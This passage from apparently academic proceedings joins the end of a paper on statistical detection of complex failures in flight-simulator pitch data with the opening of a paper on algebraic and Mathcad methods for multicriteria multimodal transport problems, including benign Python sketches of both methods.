$$\ln l(x_1, x_2, \ldots, x_N) = \frac{1}{\sigma^2}\sum_{i=1}^{N} S_i(x_i - \bar{x}) - \frac{1}{2\sigma^2}\sum_{i=1}^{N} S_i^2. \qquad (6)$$
According to the Neyman-Pearson criterion, the decision threshold $V$ is chosen from the solution of the following equation for the situation with no sinusoidal oscillations in the analyzed mixture:
$$\Pr\left\{\frac{1}{\sigma^2}\sum_{i=1}^{N} S_i(x_i - \bar{x}) - \frac{1}{2\sigma^2}\sum_{i=1}^{N} S_i^2 \ge V \,\middle|\, H_0\right\} = \alpha. \qquad (7)$$
In this case, the decision threshold is determined by statistical modeling based on the Monte Carlo method. For the given sample size and the parameter α = 0.025, as well as the parameters of the detected sinusoidal oscillation, we obtain $V \approx 0$.
In the case of an optimal Bayesian detector, the threshold can be determined by the following procedure. Let us rewrite the decision statistic in the form
$$\frac{1}{\sigma^2}\sum_{i=1}^{N} S_i(x_i - \bar{x}) = \ln l(x_1, x_2, \ldots, x_N) + \frac{1}{2\sigma^2}\sum_{i=1}^{N} S_i^2. \qquad (8)$$
Then
$$\sum_{i=1}^{N} S_i(x_i - \bar{x}) = \sigma^2 \ln \mu c + 0.5 \sum_{i=1}^{N} S_i^2, \qquad (9)$$
where $\mu = \frac{q}{p}$, $c = \frac{C_{01} - C_{00}}{C_{10} - C_{11}}$; $q$ and $p$ are the prior probabilities of the hypothesis and the alternative; $C_{00}$ and $C_{11}$ are the costs associated with proper decisions; $C_{01}$ and $C_{10}$ are the costs involved in erroneous decisions (in this case, $C_{01} > C_{00} \ge 0$, $C_{10} > C_{11} \ge 0$). Therefore, the decision threshold for an optimal Bayesian detector is
$$V = \sigma^2 \ln \mu c + 0.5 \sum_{i=1}^{N} S_i^2, \qquad (10)$$
and the decision rule is:
1) accept $H_0$ if $\sum_{i=1}^{N} S_i(x_i - \bar{x}) < V$;
2) accept $H_1$ if $\sum_{i=1}^{N} S_i(x_i - \bar{x}) \ge V$.
Let us consider the method that meets the Neyman-Pearson criterion. If the decision statistic $Q$ exceeds the threshold, then there is a sinusoidal signal in the mixture. We make the calculations for the simulation results. In the absence of a sinusoidal signal, we obtain
$$Q(x_i \mid H_0) = \sum_{i=0}^{N-1} \frac{2S_i(A_i - m) - S_i^2}{2\sigma^2} = -14.029.$$
The obtained value is less than the threshold, which indicates the absence of difficulties during the flight and that the decision made is proper. Let us consider the statistic in the presence of a sinusoidal signal:
$$Q(x_i \mid H_1) = \sum_{i=0}^{N-1} \frac{2S_i(A_i - m) - S_i^2}{2\sigma^2} = 5.004,$$
i.e. the obtained value $Q(x_i \mid H_1)$ exceeds the decision threshold $V \approx 0$, which indicates the presence of difficulties in flight and that the decision made is proper. Therefore, the proposed algorithm works correctly. Multiple simulations have confirmed the efficient detection of a sinusoidal signal for the given interference situation. The results of statistical modeling by the Monte Carlo method for 10,000 repetitions show that this detection algorithm is characterized by the following probabilities of erroneous decisions: α = 0.0267 and β = 0.0014.
Let us consider a Bayesian optimal detector with the following prior data:
– the probability of an emergency situation is p = 0.01, and the probability of a special event in flight is q = 0.99;
– the cost matrix has components $C_{00} = 0$, $C_{01} = 10$, $C_{10} = 1000$, $C_{11} = 0$.
Let us calculate the decision threshold:
$$V = \sigma^2 \ln\left(\frac{q}{p} \cdot \frac{C_{01} - C_{00}}{C_{10} - C_{11}}\right) + 0.5 \sum_{i=1}^{N} S_i^2 = 50.305.$$
We make the calculations for the simulation results shown in Fig. 4. In the absence of a sinusoidal signal, we get:
$$Q(x_i \mid H_0) = \sum_{i=1}^{N} S_i(A_i - m) = -46.794.$$
The value $Q(x_i \mid H_0)$ is less than the threshold, so we declare the absence of a sinusoidal signal and the presence of noise only. We now consider the statistic with a sinusoidal signal present. In this case:
$$Q(x_i \mid H_1) = \sum_{i=1}^{N} S_i(A_i - m) = 403.206.$$
The obtained value $Q(x_i \mid H_1)$ exceeds the decision threshold, which indicates the presence of difficulties in flight and that the decision made is proper. Therefore, the proposed algorithm works correctly. The results of statistical modeling by the Monte Carlo method for 10,000 repetitions show that this detection algorithm is characterized by the following probabilities of erroneous decisions: α = 0.0007 and β = 0.0762.
Let us consider the real pitch attitude data in a "flight" with failures (Table 2). We construct a graph of the pitch attitude with fixed amplitudes (Fig. 5). The decision statistic for the first method, according to the Neyman-Pearson criterion (decision threshold $V \approx 0$), is
$$Q(x_i) = \sum_{i=0}^{N-1} \frac{2S_i \cdot (A_i - m) - S_i^2}{2\sigma^2} = 0.232.$$
Fig. 5. Graph of the bank angle versus the “flight” time on the FFS with a complete failure of the UBC (undamped backup control) and a failure of the second (right) engine, where the amplitude of the parameter is U = 3, and the period is T = 4
For the second method, according to the Bayesian approach,
$$Q(x_i) = \sum_{i=1}^{N} S_i(A_i - m) = 45.5,$$
$$V = \sigma^2 \ln\left(\frac{q}{p} \cdot \frac{C_{01} - C_{00}}{C_{10} - C_{11}}\right) + 0.5 \sum_{i=1}^{N} S_i^2 = 40.805.$$
Thus, the two considered algorithms, based on the Neyman-Pearson criterion and the optimal Bayesian criterion, reveal the presence of a deterministic sinusoidal component in the given FFS "flight". The quality of pilot training should be compared according to the results obtained during FFS "flights" with the same set of failures. To assess the quality of pilots' training for special flights, it is advisable to have a database of statistical data on the outputs of the developed algorithms.
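As an illustration of how the two decision rules can be reproduced outside Mathcad, the following Python sketch implements both statistics under the stated signal model. It is a minimal, assumption-level rendering: the thresholds are recomputed from formulas (7) and (10) and Monte Carlo modeling, so the exact numbers will differ slightly from the values listed above.

```python
import numpy as np

m, sigma, N = 1.413, 4.407, 50                   # noise parameters and sample size
S = 2.0 * np.sin(2 * np.pi * np.arange(N) / 6)   # known sinusoid: U = 2, T = 6

def lr_statistic(x):
    """Log-likelihood ratio statistic of formula (5)."""
    return np.sum(2 * S * (x - m) - S ** 2) / (2 * sigma ** 2)

def corr_statistic(x):
    """Correlation statistic of the Bayesian rule, formulas (8)-(10)."""
    return np.sum(S * (x - m))

rng = np.random.default_rng(seed=0)              # fixed seed, reproducibility only

# Neyman-Pearson threshold: the (1 - alpha) quantile of the statistic under H0,
# estimated by Monte Carlo modeling, as in the text.
alpha = 0.025
h0_runs = [lr_statistic(rng.normal(m, sigma, N)) for _ in range(10_000)]
V_np = np.quantile(h0_runs, 1 - alpha)           # comes out close to zero

# Bayesian threshold of formula (10) with p = 0.01, q = 0.99, C01 = 10, C10 = 1000.
p, q, C01, C10 = 0.01, 0.99, 10.0, 1000.0        # C00 = C11 = 0
V_bayes = sigma ** 2 * np.log((q / p) * (C01 / C10)) + 0.5 * np.sum(S ** 2)

x_fail = rng.normal(m, sigma, N) + S             # a "flight with failures" sample
print(lr_statistic(x_fail) >= V_np)              # expect True: signal detected
print(corr_statistic(x_fail) >= V_bayes)         # expect True: signal detected
```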
3 Conclusions
The pitch attitude, as a random variable, conforms to the normal distribution law for flights without failures or with one failure; in flights with complex failures (three or more simultaneous ones), it conforms to the generalized Weibull distribution. The change in the distribution law indicates an increase in the pilot's psychophysiological tension and the need for training flights on FFSs to learn how to counteract an increase in the amplitude of aircraft parameters. The learning outcomes can be considered positive if, in flights with complex failures, the pitch attitude as a random variable conforms to the normal distribution law.
The paper shows for the first time algorithms for detecting, in the pitch attitude trends, components that indicate complex failures and the possibility of further severe difficulties in flight. These algorithms are based on the Neyman-Pearson test and the optimal Bayesian test and have an advantage over known analogues in increasing the probability of making a correct decision on stressful situations in flight to 0.9986, which significantly reduces the risk of aviation events.
The simulation results show that, when an aircraft is flying with complex failures, the pitch attitude contains, in addition to the Gaussian noise, a sinusoidal component. This is a sign indicating the presence of complex failures. From its development tendencies, it is possible to indirectly assess the degree of failure complexity (the number of failures and the types of systems at fault).
Future research directions are associated with the synthesis and analysis of new statistical methods for the detection of complex failures during flight, including a sequential approach that provides advantages in decision-making time.
References
1. Balcerzac, T., Kostur, K.: Flight simulation in civil aviation: advantages and disadvantages. Revista Europea de Derecho de la Navegación Marítima y Aeronáutica 35, 35–68 (2018)
2. Lee, A.T.: Flight Simulation. Virtual Environments in Aviation. Ashgate Publishing, Farnham (2005)
3. Gabbai, J.: The art of flight simulation. In: Simulation History & Technology, pp. 1–24 (2001)
4. Hryshchenko, Y., Zaliskyi, M., Pavlova, S., Solomentsev, O., Fursenko, T.: Data processing in the pilot training process on the integrated aircraft simulator. Electr. Control Commun. Eng. 17(1), 67–76 (2021). https://doi.org/10.2478/ecce-2021-0008
5. Human factors digest No. 7. Investigation of human factors in accidents and incidents. ICAO Circular 240-AN/144 (1993)
6. Human factors digest No. 8. Human factors in air traffic control. ICAO Circular 241-AN/145 (1993)
7. Human factors digest No. 9. Proceedings of the second ICAO flight safety and human factors global symposium. ICAO Circular 243-AN/146 (1993)
8. Human factors digest No. 10. Human factors, management and organization. ICAO Circular 247-AN/148 (1993)
9. Human factors digest No. 11. Human factors in CNS/ATM systems. ICAO Circular 249-AN/149 (1994)
10. Human factors digest No. 12. Human factors in aircraft maintenance and inspection. ICAO Circular 253-AN/151 (1995)
11. Rozenberg, R., et al.: Human factors and analysis of aviation education content of military pilots. In: New Trends in Aviation Development, Chlumec nad Cidlinou, Czech Republic, pp. 139–144 (2019). https://doi.org/10.1109/NTAD.2019.8875561
12. Kal'avský, P., et al.: Human factors and analysis of methods, forms and didactic means of aviation education of military pilots. In: New Trends in Aviation Development, Chlumec nad Cidlinou, Czech Republic, pp. 77–81 (2019). https://doi.org/10.1109/NTAD.2019.8875601
13. Vargová, M., Balážiková, M., Hovanec, M., Švab, P., Wysoczańska, B.: Estimation of human factor reliability in air operation. In: New Trends in Aviation Development, Chlumec nad Cidlinou, Czech Republic, pp. 209–213 (2019). https://doi.org/10.1109/NTAD.2019.8875591
14. McFadden, K.L., Towell, E.R.: Aviation human factors: a framework for the new millennium. J. Air Transp. Manag. 5, 177–184 (1998)
15. Huang, D., Fu, S.: Human factors modeling schemes for pilot-aircraft system: a complex system approach. In: Harris, D. (ed.) EPCE 2013. LNCS (LNAI), vol. 8020, pp. 144–149. Springer, Heidelberg (2013). https://doi.org/10.1007/978-3-642-39354-9_16
16. Shorrock, S.T., MacKendrick, H., Hook, M., Cumming, C., Lamoureux, T.: The development and application of human factors guidelines with automation support. In: People in Control. Human Interfaces in Control Rooms, Cockpits and Command Centers, Manchester, UK, pp. 67–71 (2001). https://doi.org/10.1049/cp:20010434
17. Hryshchenko, Yu., Romanenko, V., Pipa, D.: Methods for assessing of the glissade entrance quality by the crew. In: Handbook of Research on Artificial Intelligence Applications in the Aviation and Aerospace Industries, pp. 372–403. IGI Global, USA (2019). https://doi.org/10.4018/978-1-7998-1415-3.ch016
18. Hryshchenko, Yu., Romanenko, V., Zaliskyi, M.: Quality assessment of aircraft glide path entrance. In: CEUR Workshop Proceedings, vol. 2711, pp. 649–660 (2020)
19. Mukhopadhyay, N.: Probability and Statistical Inference. CRC Press (2020)
20. Bolstad, W.M.: Introduction to Bayesian Statistics. Wiley, New York (2007)
21. Prokopenko, I.G., Migel, S.V., Prokopenko, K.I.: Signal modeling for the efficient target detection tasks. In: International Radar Symposium, Dresden, Germany, pp. 976–982 (2013)
22. Prokopenko, I., Omelchuk, I., Maloyed, M.: Synthesis of signal detection algorithms under conditions of aprioristic uncertainty. In: IEEE Ukrainian Microwave Week, Kharkiv, Ukraine, pp. 418–423 (2020). https://doi.org/10.1109/UkrMW49653.2020.9252687
23. Hryshchenko, Y.: Reliability problem of ergatic control systems in aviation. In: International Conference on Methods and Systems of Navigation and Motion Control, Kyiv, Ukraine, pp. 126–129 (2016). https://doi.org/10.1109/MSNMC.2016.7783123
24. Volosyuk, V., et al.: Optimal method for polarization selection of stationary objects against the background of the Earth's surface. Int. J. Electron. Telecommun. 68(1), 83–89 (2022). https://doi.org/10.24425/ijet.2022.139852
25. Shmatko, O., et al.: Synthesis of the optimal algorithm and structure of contactless optical device for estimating the parameters of statistically uneven surfaces. Radioelectron. Comput. Syst. 4, 199–213 (2021). https://doi.org/10.32620/reks.2021.4.16
26. Ostroumov, I., Kuzmenko, N.: Configuration analysis of European navigational aids network. In: 2021 Integrated Communications Navigation and Surveillance Conference (ICNS), pp. 1–9 (2021). https://doi.org/10.1109/ICNS52807.2021.9441576
27. Zaliskyi, M., Solomentsev, O.: Method of sequential estimation of statistical distribution parameters in control systems design. In: IEEE 3rd International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), Kyiv, Ukraine, pp. 135–138 (2014). https://doi.org/10.1109/MSNMC.2014.6979752
28. Solomentsev, O., et al.: Substantiation of probability characteristics for efficiency analysis in the process of radio equipment diagnostics. In: 2021 IEEE 3rd Ukraine Conference on Electrical and Computer Engineering (UKRCON), Lviv, Ukraine, pp. 535–540 (2021). https://doi.org/10.1109/UKRCON53503.2021.9575603
29. Ostroumov, I.V., Kuzmenko, N.S.: Accuracy estimation of alternative positioning in navigation. In: 2016 4th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), pp. 291–294 (2016). https://doi.org/10.1109/MSNMC.2016.7783164
30. Zaliskyi, M., et al.: Heteroskedasticity analysis during operational data processing of radio electronic systems. In: Shukla, S., Unal, A., Varghese Kureethara, J., Mishra, D.K., Han, D.S. (eds.) Data Science and Security. LNNS, vol. 290, pp. 168–175. Springer, Singapore (2021). https://doi.org/10.1007/978-981-16-4486-3_18
31. Sushchenko, O.A., Golitsyn, V.O.: Data processing system for altitude navigation sensor. In: Methods and Systems of Navigation and Motion Control, Kyiv, Ukraine, pp. 84–87 (2016). https://doi.org/10.1109/MSNMC.2016.7783112
32. Kharchenko, V.P., Kuzmenko, N.S., Ostroumov, I.V.: Identification of unmanned aerial vehicle flight situation. In: IEEE 4th International Conference on Actual Problems of Unmanned Aerial Vehicles Developments (APUAVD), Kyiv, Ukraine, pp. 116–120 (2017). https://doi.org/10.1109/APUAVD.2017.8308789
33. Bickel, P.J., Doksum, K.A.: Mathematical Statistics: Basic Ideas and Selected Topics. Wiley, New York (2001)
34. Ostroumov, I., Marais, K., Kuzmenko, N.: Aircraft positioning using multiple distance measurements and spline prediction. Aviation 26(1), 1–10 (2022). https://doi.org/10.3846/aviation.2022.16589
Information Technology in Engineering and Robotics
Solving Multimodal Transport Problems Using Algebraic Approach
Sergii Mogilei(B), Artem Honcharov, and Yurii Tryus
Cherkasy State Technological University, Cherkasy, Ukraine
[email protected]
Abstract. The paper considers a multicriteria multimodal transport problem that contains three types of transport and two objective functions. The article investigates the possibility of transforming a multicriteria multimodal transport problem into a classical transport problem by constructing a system of linear matrix equations and inequalities. It is shown that the dimension of the corresponding system of linear matrix equations and inequalities depends directly on the number of objective functions of the considered problem. The paper proposes an algorithm for finding the problem's reference plans, which is based on finding the reference plans for the different types of vehicles. The multicriteria problem is solved using the method of weighted coefficients and the method of successive concessions according to the relevant criteria. Tools of the computer mathematics system Mathcad were used for the numerical experiment on solving demonstration problems by the methods proposed in the work and for comparing the obtained results. The application of the methods proposed in this paper for solving multicriteria multimodal transport problems makes it possible to reduce the number of iterations in the numerical solution of these problems and to overcome the problem of differing units of measurement of the objective functions in their superposition.
Keywords: Multicriteria optimization · multimodal transport problem · system of linear matrix equations and inequalities · integrated reference plan method · Mathcad
1 Introduction
Logistics problems facing investigators of transportation processes [1] are seriously complex. This is explained both by the pronounced multimodality of such problems and by the large number of logistics optimization criteria. Besides, considering that the classical transport problem is to determine the optimal transportation plan [2], the dimensions of the problem largely determine the volume of data processed [3]; in other words, the number of departure and delivery points really matters. Beyond the dimension of the problem itself, it is important to regard the content and properties of its objective functions since, if they are excessively complex, the hardware and software demands of the calculations may increase.
The problem of solving modern transport tasks of high dimensionality is currently of great interest. We will consider a multimodal problem [4] to be one that involves the simultaneous use of several means of transport. The first stage of the study considers multimodal transport problems with one optimization criterion. The purpose of this stage is to study how the proposed algorithms work when there is only one objective function. The next stage of the study is the analysis and solution of a multicriteria model of a multimodal transport problem. This transition from a single criterion to multiple criteria will make it possible to determine the significant differences between the algorithms for implementing different classes of multimodal transport problems.
In recent times, multicriteria multimodal transport problems have become a focus of attention, and various models of them are regarded through various optimization criteria, for instance, time delay optimization as well as money expenditures and fuel charges [5]. Indeed, time and money factors are quite important considering probable additional constraints, for example, the number of containers for cargo transportation [6], etc. As for the model of the problem, we adopt a formulation with three means of transport and two optimization criteria [7]. Examples of different modes of transport are road, rail, water (internal, i.e., river, or external, i.e., sea), air, etc. Objective functions, in addition to those mentioned above, can be functions minimizing the cost of transportation (the classical criterion) or minimizing risk [8], etc. This formulation of the transport problem model is quite sufficient to demonstrate the efficiency of the vast majority of algorithms for its solution.
In searching for a solution to this problem, it is worth investigating it through the Pareto-optimal set [9]. That is, as a result of solving the multimodal transport problem, Pareto-optimal solutions should be obtained. Moreover, the more constrained the Pareto-optimal set is, the sooner, and in fewer iterations, the optimal solution of the problem will be found. Otherwise, if the Pareto set of the related problem is too complex or too broad, the search for the optimal solution can be considerably delayed.
One of the main issues in the numerical solution of multicriteria transport problems today is the determination of the initial reference plan. Solving this issue makes it possible to considerably reduce the number of iterations in solving the problem. It is especially relevant to problems of high dimensionality. Therefore, it is important to work out new and more efficient methods to solve this problem.
The purpose of the investigation is to study the possibilities of transforming multicriteria multimodal transport problems into similar single-criterion problems with one means of cargo delivery, that is, classical transport problems, as well as the construction of new methods for solving this class of problems. A proper solution of problems of this type is generally impossible without special software. Therefore, the paper provides examples of using the Mathcad environment to implement the methods proposed in the study. The main part of the article covers the following issues: problem statement, method of problem solution, scheme of the algorithm, and solving the problem using Mathcad.
Problem Statement. Construct a model of a classical multimodal transport problem for three means of transport.
This model will contain one objective function of minimization
S and three cost matrices for transportation $C^k = (c_{ij}^k)$:
$$S(X^k) = C^k \times X^k \to \min,$$
$$\sum_{k=1}^{3}\sum_{j=1}^{m} x_{ij}^k = a_i, \quad i = \overline{1,n},$$
$$\sum_{k=1}^{3}\sum_{i=1}^{n} x_{ij}^k = b_j, \quad j = \overline{1,m},$$
$$x_{ij}^k \ge 0, \quad k = \overline{1,3},\ i = \overline{1,n},\ j = \overline{1,m}, \qquad (1)$$
where $n$, $m$ are the numbers of departure points and delivery points, respectively; $X^k = (x_{ij}^k)$ are the sought matrices of reference plans for each means of transport; $x_{ij}^k$ is the amount of cargo transported from the $i$-th departure point to the $j$-th delivery point by the $k$-th means of transport; $c_{ij}^k \ge 0$ is the cost (per unit) of cargo transported from the $i$-th departure point to the $j$-th delivery point by the $k$-th means of transport; $a_i > 0$ is the quantity of supplies at the $i$-th departure point, and $b_j > 0$ is the quantity of needs at the $j$-th delivery point. At the same time, we assume that the balance condition is met:
$$\sum_{i=1}^{n} a_i = \sum_{j=1}^{m} b_j.$$
The relation $C^k \times X^k$ is given as
$$C^k \times X^k = \sum_{k=1}^{3}\sum_{i,j=1}^{n,m} c_{ij}^k \cdot x_{ij}^k, \qquad (2)$$
that is, the objective function $S$ of the problem is the sum of the products of the corresponding elements of the cost matrices and the reference plans over all means of transport.
Let us expand problem statement (1) and construct the model of a multimodal transport problem that contains two objective functions of minimization, cost $S$ and risk $R$:
$$S(X^k) = C^k \times X^k \to \min,$$
$$R(X^k) = R^k \times X^k \to \min,$$
$$\sum_{k=1}^{3}\sum_{j=1}^{m} x_{ij}^k = a_i, \quad i = \overline{1,n},$$
$$\sum_{k=1}^{3}\sum_{i=1}^{n} x_{ij}^k = b_j, \quad j = \overline{1,m},$$
$$x_{ij}^k \ge 0, \quad k = \overline{1,3},\ i = \overline{1,n},\ j = \overline{1,m}, \qquad (3)$$
where $R^k = (r_{ij}^k)$, $0 \le r_{ij}^k \le 1$, is the risk of transporting the cargo from the $i$-th departure point to the $j$-th delivery point by the $k$-th means of transport (the risk matrices $R^k$ are known). Denote by $S_{\min}$, $R_{\min}$ the minimal values of the objective functions $S$, $R$, respectively, and by $\bar{X}_S$, $\bar{X}_R$ the corresponding optimal plans. We now proceed to solve problems (1) and (3).
2 Methods
2.1 Method of Problem Solution
The solution of problem (1) applies an algorithm based on the integrated reference plan method [10]:
1. Construct the matrix $St$ of minimal (according to the minimization criterion) elements of the matrices $C^k$, that is:
$$St = (St_{ij}) = \min_k (C_{ij}^k), \quad St_{ij} = \min_k (c_{ij}^k), \quad i = \overline{1,n},\ j = \overline{1,m},\ k = \overline{1,3}. \qquad (4)$$
2. Construct problem (5), which is equivalent to problem (1), and minimize the objective function $S1$:
$$S1(X) = St \times X = \sum_{i,j=1}^{n,m} St_{ij} \cdot x_{ij} \to \min,$$
$$\sum_{j=1}^{m} x_{ij} = a_i, \quad i = \overline{1,n},$$
$$\sum_{i=1}^{n} x_{ij} = b_j, \quad j = \overline{1,m},$$
$$x_{ij} \ge 0, \quad i = \overline{1,n},\ j = \overline{1,m}, \qquad (5)$$
where $X = (x_{ij})$ is the matrix of the integrated reference plan, and $X = X^1 + X^2 + X^3$ is the sum of the reference plans for all modes of transport.
3. As the result of minimization (5), we obtain the minimal value $S1_{\min} = S1(\bar{X})$ of the objective function $S1$ and the integrated reference plan $\bar{X} = (\bar{x}_{ij})$ of the problem, which is Pareto-optimal. Notice that $S1_{\min} = S_{\min}$; meanwhile, the statement is proved for
$$\bar{X} = \sum_{k=1}^{3} X^k, \qquad (6)$$
where $X^k = (x_{ij}^k)$, $\bar{X} = (\bar{x}_{ij})$, $\bar{x}_{ij} = \sum_{k=1}^{3} x_{ij}^k$, $i = \overline{1,n}$, $j = \overline{1,m}$.
Since the problem asks for the matrices of reference plans $\bar{X}^k$ for each type of transport, we write down the system of linear matrix equations that follows from (5) and (6):
$$\begin{cases} X^1 + X^2 + X^3 = \bar{X}, \\ C^1 \times X^1 + C^2 \times X^2 + C^3 \times X^3 = S_{\min}. \end{cases} \qquad (7)$$
Note that if only two means of transport are present (k = 2), system (7) becomes:
$$\begin{cases} X^1 + X^2 = \bar{X}, \\ C^1 \times X^1 + C^2 \times X^2 = S_{\min}. \end{cases} \qquad (8)$$
System (8) is, in general, a system of two linear matrix equations in two matrices. This allows us to hypothesize that such a system has a single solution, because it can be solved in explicit form by passing to the following systems:
$$\begin{cases} X^1 = \bar{X} - X^2, \\ C^1 \times (\bar{X} - X^2) + C^2 \times X^2 = S_{\min} \end{cases} \quad \text{or} \quad \begin{cases} X^2 = \bar{X} - X^1, \\ C^1 \times X^1 + C^2 \times (\bar{X} - X^1) = S_{\min}. \end{cases} \qquad (9)$$
Through simple algebraic transformations, systems (9) become the group of systems:
$$\begin{cases} X^1 = \bar{X} - X^2, \\ (C^2 - C^1) \times X^2 = S_{\min} - C^1 \times \bar{X} \end{cases} \quad \text{or} \quad \begin{cases} X^2 = \bar{X} - X^1, \\ (C^1 - C^2) \times X^1 = S_{\min} - C^2 \times \bar{X}. \end{cases} \qquad (10)$$
The problem in statement (3) is solved in the same way as (1), but successively for each optimization criterion. Obviously, in this case the following system of equations and inequalities is obtained:
$$\begin{cases} X^1 + X^2 + X^3 = \bar{X}, \\ C^1 \times X^1 + C^2 \times X^2 + C^3 \times X^3 \ge S_{\min}, \\ R^1 \times X^1 + R^2 \times X^2 + R^3 \times X^3 \ge R_{\min}. \end{cases} \qquad (11)$$
Note that when solving systems (7)–(11), the conditions $x_{ij}^k \ge 0$, $k = \overline{1,3}$, $i = \overline{1,n}$, $j = \overline{1,m}$ are fulfilled by default.
If the integrated reference plan method is applied to problem (3), it is possible to obtain the minimal values $S_{\min}$, $R_{\min}$ of the objective functions $S$, $R$, respectively. However, there will be two integrated reference plans, one for each optimization criterion: $\bar{X}_S$, $\bar{X}_R$, for cost and for risk, respectively. To obtain a compromise reference plan $\bar{X}$ in relation to $\bar{X}_S$, $\bar{X}_R$, problem (3) has to be solved as a multicriteria optimization problem. Therefore, two means of solution are regarded: the weighted coefficients method [11, 12] and the successive concessions method [13, 14].
According to the weighted coefficients method, it is necessary to construct a superposition $F$ of the objective functions $S$ and $R$, then minimize it and obtain a matrix of the reference plan $\bar{X}$:
(12)
where k1 , k2 ∈ R; k1 , k2 ≥ 0; k1 + k1 = 1. The method has two disadvantages: 1. Function F is indefinitely measured (cost S is measured in monetary units, and risk R – in conditional units). 2. Since the function F is minimized similarly to (5), there is an additional problem of constructing the matrix of minimal elements St. This is possible, however, complicates the overall process of algorithmization of the main task. Both of these disadvantages can be avoided if the method of successive concessions is applied to solve the problem (3), as it was introduced in [15]. The method consists in
88
S. Mogilei et al.
the fact that between the reference plans X¯ S , X¯ R there is some reference plan X¯ that is sufficient, in opinion of decision maker, for both objective functions of problem (3). To obtain this plan it is possible to apply the mechanism of successive concessions related to the main criterion of optimization (for example, S), gradually transforming its value to benefit the additional criterion (that is R). This plan can be obtained through the mechanism of successive concessions to the main optimization criterion (for example, S), gradually changing its value in favor of the secondary criterion (for example, R). This algorithm forces to turn to the weighted coefficients method, though in some other interpretation as in (12). Partially, this approach is shown in [10], where not superposition F of objective functions S and R is regarded, but the compromising reference plan X as a superposition of reference plans X¯ S , X¯ R for each optimization criterion: X¯ = k1 · X¯ S + k2 · X¯ R ,
(13)
where k1 , k2 ∈ R; k1 , k2 ≥ 0; k1 + k1 = 1 and relation k · X , X = (xij ) for the case i, j = 1, 2 is written as: k · x11 k · x12 x x . (14) k · X = k · (xij ) = k · 11 12 = x21 x22 k · x21 k · x22 The main conclusion for these methods application is that the reference plan X for the problem (3) really exists and the algorithm for its defining is known and therefore the system (11) can be solved. Besides, this solution is not the only one, because the system (11) includes 1 matrix equation and 2 matrix inequalities. 2.2 Scheme for the Algorithm and Solving the Problem Using Mathcad Hence, it is possible to make a general scheme of algorithm of transformation of a multicriteria multimodal transport problem into similar one-criterial problem with one mean of transportation (Fig. 1). Obviously, the number of criteria for problems (1) and (3) determines the number of linear matrix equations and inequalities in systems like (7), (8) and (11). In other words, if the multimodal transport problem is a σ-criteria one, the measurement for the related system of equations and inequalities will be equal to σ + 1.
Solving Multimodal Transport Problems Using Algebraic Approach
89
Fig. 1. Block-scheme for the algorithm of solution of multicriteria multimodal transport problem of the form (3)
3 Results First, the problem (1) must be solved with one optimization criterion and three means of transportation. The solution is based on the initial data of the problem and the results obtained in [10], as well as on the algorithm from Fig. 1. Presumably, to solve problems (1) and (3) with Mathcad, it is important to apply the initial data in block Given and solution search functions Find, Minerr and Minimize [16]. Minimize function is responsible for calculating minimal value of the objective function; Find and Minerr functions are applied for solving equations, inequalities and their systems. The difference between them is that function Find returns the exact value of equation roots (their systems), whereas Minerr function does the same with the result of the latest numeric iteration of the algorithm for solution search (and in case of its coincidence the result of the process will be the same as the result of Find function). According to these properties the proper function for the problem solution will be chosen while using Mathcad.
90
S. Mogilei et al.
Let’s consider examples of the application of the described methods of solving transport problems (1) and (3) with Mathcad. 1. Finally, 3 cost matrices for each means of transportation, as in problem statement (1), are given: ⎛
⎞ 521.25 397.5 112.5 C 1 = ⎝ 597.5 473.75 190.05 ⎠, 693.75 591.25 178.75 ⎛ ⎞ 435.6 230.0 76.32 C 2 = ⎝ 485.28 279.36 149.76 ⎠, 469.44 339.84 110.88 ⎛ ⎞ 372.02 250.0 38.0 C 3 = ⎝ 331.36 223.06 76.0 ⎠ 404.32 296.4 88.16 The amounts of supplies in departure points and needs in delivery points are correspondingly equal to A = (480; 420; 300), and B = (320; 500; 380). In Mathcad (Fig. 2):
Fig. 2. Input data of the problem: matrices of the cost of transportation, stocks at the points of departure and needs of the points of delivery.
2. Calculate matrix of minimal costs of type (4) (Fig. 3):
Fig. 3. Calculating matrix of minimal costs
Fig. 4. Calculating X and S(X)
3. Introduce the objective function S(X) and the constraints of the problem, solve problem (5), find the matrix X̄ of the optimal compromise reference plan, and calculate the optimal value of the objective function S(X) (Fig. 4). The obtained results completely coincide with the results obtained earlier in [10].
4. Point 4 of the algorithm from Fig. 1 is omitted for problem (1), as it is not a multicriteria one.
5. Further, solve the system of Eqs. (7) (Fig. 5).
6. The matrices of reference plans X^k for each type of transport are found, which form the optimal compromise plan X̄ according to (6) (Fig. 6).
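As an orientation sketch — not the authors' Mathcad listing — the following Python fragment reproduces steps 1–3 on the demonstration data above, using scipy.optimize.linprog in place of Minimize; all variable names are illustrative.

```python
import numpy as np
from scipy.optimize import linprog

C = np.array([
    [[521.25, 397.50, 112.50], [597.50, 473.75, 190.05], [693.75, 591.25, 178.75]],
    [[435.60, 230.00,  76.32], [485.28, 279.36, 149.76], [469.44, 339.84, 110.88]],
    [[372.02, 250.00,  38.00], [331.36, 223.06,  76.00], [404.32, 296.40,  88.16]],
])
a = np.array([480, 420, 300])         # supplies at departure points
b = np.array([320, 500, 380])         # needs at delivery points
n, m = 3, 3

St = C.min(axis=0)                    # matrix of minimal costs, formula (4)

# Classical transport problem (5) for the integrated plan X.
A_eq, b_eq = [], []
for i in range(n):                    # row-sum (supply) constraints
    row = np.zeros(n * m); row[i * m:(i + 1) * m] = 1
    A_eq.append(row); b_eq.append(a[i])
for j in range(m):                    # column-sum (demand) constraints
    col = np.zeros(n * m); col[j::m] = 1
    A_eq.append(col); b_eq.append(b[j])

res = linprog(St.ravel(), A_eq=np.array(A_eq), b_eq=b_eq, bounds=(0, None))
X_bar = res.x.reshape(n, m)           # integrated reference plan
print(X_bar.round(1), res.fun)        # S1_min = S_min, as stated in Sect. 2.1
```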
Fig. 5. Solution of the system of equations
Fig. 6. Results of calculations of the reference plan matrices X^k, k = 1, 3 (in the figure they are marked V0, V1, V2, respectively)
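A corresponding sketch for step 5 — recovering the per-mode plans from system (7) — can treat the system as a linear feasibility problem. It reuses C, X_bar, and res from the previous fragment and is, again, only an assumption-level illustration: the solution set of (7) is generally non-unique, so the recovered plans may differ from those in Fig. 6 while satisfying the same constraints.

```python
import numpy as np
from scipy.optimize import linprog

nm = 9                                          # 3x3 cells per transport mode
A_eq = np.zeros((nm + 1, 3 * nm))
b_eq = np.zeros(nm + 1)
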